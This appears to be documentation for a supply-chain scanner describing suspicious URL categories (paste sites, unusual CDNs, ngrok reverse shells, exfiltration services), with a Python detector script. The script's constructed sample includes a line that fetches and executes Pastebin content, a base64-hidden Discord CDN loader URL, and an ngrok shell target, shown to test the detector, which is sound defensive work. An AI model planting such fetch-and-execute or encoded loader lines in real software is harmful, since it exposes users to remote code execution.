Suspicious URL References

Description

There are some widely used URLs that, on their own, aren't necessarily malicious but when referenced or used in the context of open source software should be treated with suspicion and scrutiny.

Paste Tools

Paste tools like Pastebin.com are online content-hosting services where users can store plain text such as source code snippets. Attackers can host malicious code on these sites and then have any other piece of code pull it down and execute it.

Web Application Security Testing Tools

When testing web application security, it's sometimes necessary to reach out to a remote server to detect what security vulnerabilities might be present on the system. Finding references to these servers could indicate that an attacker is looking for vulnerabilities in an effort to exploit them later.

Unusual CDNs (Content Delivery Networks)

CDNs, or content delivery networks, are effectively a form of cloud-based storage. An attacker can reach out to a CDN to pull down any desired file and execute it.

Obfuscation Tools

These are tools used to obfuscate code, making it harder for a user of the library to understand what the code is doing.

Reverse Shells

A reverse shell allows an attacker to initiate a shell session on the victim's computer. Some recent malware has been observed using web-based tools such as tcp.ngrok.io to establish reverse shells.

Data Exfiltration Tools

Data exfiltration tools allow an attacker to easily push data from a compromised machine to a site from which they can later access and retrieve that information.
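As an added example (not code from the original page or from any scanner it describes), the following Python script shows how a check for the categories above can be implemented: it extracts hostnames from source lines, matches them by domain suffix against a category table, and, going one step beyond the text, also decodes base64 string literals so that a reference hidden behind simple encoding is still attributed to its category. The category table only contains hosts the page names (Pastebin.com, tcp.ngrok.io); cdn.discordapp.com is the assumed hostname for the Discord CDN, and the sample source being scanned is constructed for the demonstration.

```python
import base64
import re
from dataclasses import dataclass

# Starting point for a suspicious-host table; keys are matched as domain suffixes
# so that subdomains such as tcp.ngrok.io are covered by ngrok.io.
# cdn.discordapp.com is an assumed hostname for the Discord CDN; the rest of the
# categories on the page (security testing tools, obfuscators, exfiltration
# services) would be appended here in the same form.
SUSPICIOUS_HOSTS = {
    "pastebin.com": "paste tool",
    "ngrok.io": "reverse shell / tunnelling",
    "cdn.discordapp.com": "unusual CDN",
}

# Optional scheme followed by a dotted hostname; bare hosts like "tcp.ngrok.io"
# are matched as well as full URLs.
HOST_RE = re.compile(r"(?:https?://)?\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)
# Candidate base64 literals: long runs of the base64 alphabet with optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


@dataclass
class Finding:
    line_no: int
    host: str
    category: str
    encoded: bool  # True when the host was only visible after base64 decoding


def classify_host(host: str):
    """Return the category for a host, or None if it matches no suffix."""
    host = host.lower()
    for suffix, category in SUSPICIOUS_HOSTS.items():
        if host == suffix or host.endswith("." + suffix):
            return category
    return None


def _hosts_in(text: str):
    for m in HOST_RE.finditer(text):
        yield m.group(1).lower()


def scan_source(text: str):
    """Scan source text line by line and report suspicious host references."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for host in _hosts_in(line):
            category = classify_host(host)
            if category:
                findings.append(Finding(line_no, host, category, encoded=False))
        # Second pass: decode base64-looking literals and scan the plaintext.
        for m in B64_RE.finditer(line):
            try:
                decoded = base64.b64decode(m.group(0), validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue  # not valid base64, or not text once decoded
            for host in _hosts_in(decoded):
                category = classify_host(host)
                if category:
                    findings.append(Finding(line_no, host, category, encoded=True))
    return findings


# Constructed sample of a package file that pulls and runs remote content.
ENCODED_URL = base64.b64encode(
    b"https://cdn.discordapp.com/attachments/1/2/loader.bin"
).decode()
SAMPLE = f'''\
import urllib.request
PAYLOAD = "https://pastebin.com/raw/AbCdEfGh"
exec(urllib.request.urlopen(PAYLOAD).read())
LOADER = "{ENCODED_URL}"
SHELL = ("tcp.ngrok.io", 12345)
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        flag = " (base64-encoded)" if f.encoded else ""
        print(f"line {f.line_no}: {f.host} -> {f.category}{flag}")
```

Suffix matching is deliberate: an exact-host table would miss `tcp.ngrok.io` if only `ngrok.io` were listed, while a plain substring test would also flag unrelated names such as `notpastebin.com`. A finding is a prompt for review rather than a verdict, which is why the output carries the category instead of a severity.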

Importance

As mentioned previously, the types of sites shown above are not necessarily malicious on their own, but when they are referenced in open source software, the user of that software should be made aware of the reference so they can determine whether the site is being used with malicious intent.

Examples

During the course of 2020, it was found that the Discord CDN was used to host all kinds of malicious software such as Epsilon ransomware, Redline stealer, and the XMRig cryptocurrency miner.